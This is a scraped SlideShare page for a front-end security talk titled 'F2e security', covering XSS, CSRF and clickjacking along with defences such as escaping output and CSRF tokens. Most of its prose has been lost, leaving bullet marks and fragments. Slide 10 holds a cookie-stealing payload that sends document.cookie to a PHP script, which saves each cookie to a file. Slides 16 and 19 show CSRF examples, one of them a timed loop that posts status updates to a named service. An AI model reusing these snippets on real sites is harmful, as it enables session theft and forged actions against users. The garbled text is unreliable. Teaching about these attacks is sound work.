0
2
3
4
•    –    –    –••
Cross-site scripting   XSS
XSS
•    Cookie•    DOM••…
Yupoo   XSS
alert
Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie);               PHP<?phpif (isset(...
“   ”
• Filter input,Escape output•         Cookie•              noscript?
••
• http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/arch...
CSRF Cross Site Request Forgery
<img src=“http://.../del.php?id=64” />
<form action="http://jiwai.de/wo/status/update"  method="post">    <textarea name="jw_status"></textarea>    <input type="...
••   GET   POST•
setInterval(function() {    var img = new Image();    var message =        ;    var api = http://jiwai.de/wo/status/  upda...
“   ”
•       GET POST    Cookie•   Referer•           Token•
•   _tb_token_•          Referer
• http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/...
Twitter   Clickjacking
1.        iframe     Twitter               02.           “   ”3.     Twitter
••
CSRF
Cookie Session
•   “JS   ”••
Q&A
alert(/tHx/).replace(/.+/, eval);
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
F2e security
Upcoming SlideShare
Loading in...5
×

F2e security

1,962

Published on

Published in: Technology, Design
0 Comments
18 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,962
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
207
Comments
0
Likes
18
Embeds 0
No embeds

No notes for slide

Transcript of "F2e security"

  1. 1. 2
  2. 2. 3
  3. 3. 4
  4. 4. • – – –••
  5. 5. Cross-site scripting XSS
  6. 6. XSS
  7. 7. • Cookie• DOM••…
  8. 8. Yupoo XSS
  9. 9. alert
  10. 10. Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie); PHP<?phpif (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt,urldecode($_GET[var]));}
  11. 11. “ ”
  12. 12. • Filter input,Escape output• Cookie• noscript?
  13. 13. ••
  14. 14. • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
  15. 15. CSRF Cross Site Request Forgery
  16. 16. <img src=“http://.../del.php?id=64” />
  17. 17. <form action="http://jiwai.de/wo/status/update" method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
  18. 18. •• GET POST•
  19. 19. setInterval(function() { var img = new Image(); var message = ; var api = http://jiwai.de/wo/status/ update; img.src = api + ?jw_status= + message + &t= + +new Date();}, 1000);
  20. 20. “ ”
  21. 21. • GET POST Cookie• Referer• Token•
  22. 22. • _tb_token_• Referer
  23. 23. • http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/csrf-securit.html• http://www.playhack.net/view.php?id=31
  24. 24. Twitter Clickjacking
  25. 25. 1. iframe Twitter 02. “ ”3. Twitter
  26. 26. ••
  27. 27. CSRF
  28. 28. Cookie Session
  29. 29. • “JS ”••
  30. 30. Q&A
  31. 31. alert(/tHx/).replace(/.+/, eval);
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×